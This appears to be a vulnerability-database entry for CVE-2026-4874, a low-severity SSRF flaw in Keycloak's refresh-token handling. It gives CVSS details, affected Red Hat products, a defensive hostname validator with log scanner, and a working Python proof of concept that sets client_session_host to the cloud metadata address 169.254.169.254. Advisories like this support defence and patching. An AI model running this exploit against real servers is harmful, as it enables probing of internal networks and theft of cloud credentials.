Security Vulnerability Report
CVE-2026-4874 CVSS 3.1 LOW

CVE-2026-4874

Published: 2026-03-26 08:16:23
Last Modified: 2026-04-01 14:11:28

Description

A flaw was found in Keycloak. An authenticated attacker can perform Server-Side Request Forgery (SSRF) by manipulating the `client_session_host` parameter during refresh token requests. This occurs when a Keycloak client is configured to use the `backchannel.logout.url` with the `application.session.host` placeholder. Successful exploitation allows the attacker to make HTTP requests from the Keycloak server’s network context, potentially probing internal networks or internal APIs, leading to information disclosure.
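As an added example that is not part of this report or of Keycloak's own code, the following Python shows the mitigation side of the flaw described above: a validator that only substitutes a client-supplied `client_session_host` into `backchannel.logout.url` when it is a bare, pre-registered hostname (never a URL, path or IP literal), plus a check over token-endpoint request logs that flags refresh requests whose value would have been rejected. The `${application.session.host}` placeholder spelling, the `ALLOWED_HOSTS` set and the `key=value` log format are assumptions.

```python
import ipaddress
import re
from urllib.parse import unquote

PLACEHOLDER = "${application.session.host}"   # assumed spelling of the placeholder
ALLOWED_HOSTS = {"app.example.com"}            # constructed: hosts registered for the client
# Bare DNS name only: labels of 1-63 chars, no leading/trailing hyphen, no scheme/port/path.
HOST_RE = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*")

def is_acceptable_session_host(value, allowed_hosts=ALLOWED_HOSTS):
    """Accept only a bare, registered hostname; any IP literal is rejected outright,
    so loopback, RFC 1918 and link-local (cloud metadata) addresses can never pass."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value.strip("[]"))
        return False
    except ValueError:
        pass
    if not HOST_RE.fullmatch(value):
        return False  # "/", ":", "@", "?", "#" and whitespace all fail here
    return value.lower() in allowed_hosts

def resolve_backchannel_url(template, session_host, allowed_hosts=ALLOWED_HOSTS):
    """Fill the placeholder only with a validated host; return None on rejection."""
    if PLACEHOLDER not in template:
        return template  # nothing client-controlled is interpolated
    if not is_acceptable_session_host(session_host, allowed_hosts):
        return None
    return template.replace(PLACEHOLDER, session_host.lower())

# Constructed key=value request log lines; not a real Keycloak log format.
SAMPLE_LOG = [
    "ts=2026-03-26T08:16:23Z grant_type=refresh_token client_id=webapp client_session_host=app.example.com",
    "ts=2026-03-26T08:17:01Z grant_type=refresh_token client_id=webapp client_session_host=http%3A%2F%2F10.0.0.5%2Fadmin",
    "ts=2026-03-26T08:17:09Z grant_type=client_credentials client_id=svc",
]

def flag_suspicious_refresh_requests(log_lines, allowed_hosts=ALLOWED_HOSTS):
    """Return (client_id, host) for refresh-token requests whose host fails validation."""
    hits = []
    for line in log_lines:
        fields = dict(kv.split("=", 1) for kv in line.split() if "=" in kv)
        if fields.get("grant_type") != "refresh_token" or "client_session_host" not in fields:
            continue
        host = unquote(fields["client_session_host"])
        if not is_acceptable_session_host(host, allowed_hosts):
            hits.append((fields.get("client_id"), host))
    return hits
```

Running `flag_suspicious_refresh_requests(SAMPLE_LOG)` returns the one constructed request whose value is a URL rather than a registered hostname.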

CVSS Details

CVSS Score
3.1
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:redhat:build_of_keycloak:-:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:redhat:jboss_enterprise_application_platform:8.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:jboss_enterprise_application_platform_expansion_pack:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:single_sign-on:7.0:*:*:*:*:*:*:* - VULNERABLE
Keycloak (see the vendor advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2026-4874: Keycloak SSRF via client_session_host
# This script demonstrates how an authenticated attacker can manipulate the
# client_session_host parameter during a refresh token request to trigger an SSRF.

import requests

# Configuration
TARGET_HOST = "https://keycloak.example.com"
REALM = "master"
CLIENT_ID = "admin-cli"

# Attacker's valid refresh token (obtained after login)
REFRESH_TOKEN = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."

# Internal target to probe (e.g., AWS metadata, internal admin panel)
SSRF_PAYLOAD = "http://169.254.169.254/latest/meta-data/"


def exploit_ssrf():
    url = f"{TARGET_HOST}/realms/{REALM}/protocol/openid-connect/token"
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }

    # Exploit payload: The vulnerable parameter client_session_host
    data = {
        "grant_type": "refresh_token",
        "client_id": CLIENT_ID,
        "refresh_token": REFRESH_TOKEN,
        "client_session_host": SSRF_PAYLOAD  # Malicious internal URL
    }

    print(f"[*] Sending SSRF request to {url}...")
    print(f"[*] Targeting internal host: {SSRF_PAYLOAD}")

    try:
        response = requests.post(url, headers=headers, data=data, verify=False)
        if response.status_code == 200:
            print("[+] Request sent successfully. Check internal logs or response timing for indication of success.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(response.text)
    except Exception as e:
        print(f"[!] Error occurred: {e}")


if __name__ == "__main__":
    exploit_ssrf()
```

Weakness

CWE-918 (Server-Side Request Forgery)

References

https://access.redhat.com/security/cve/CVE-2026-4874 (Vendor Advisory)
https://bugzilla.redhat.com/show_bug.cgi?id=2451611 (Issue Tracking, Vendor Advisory)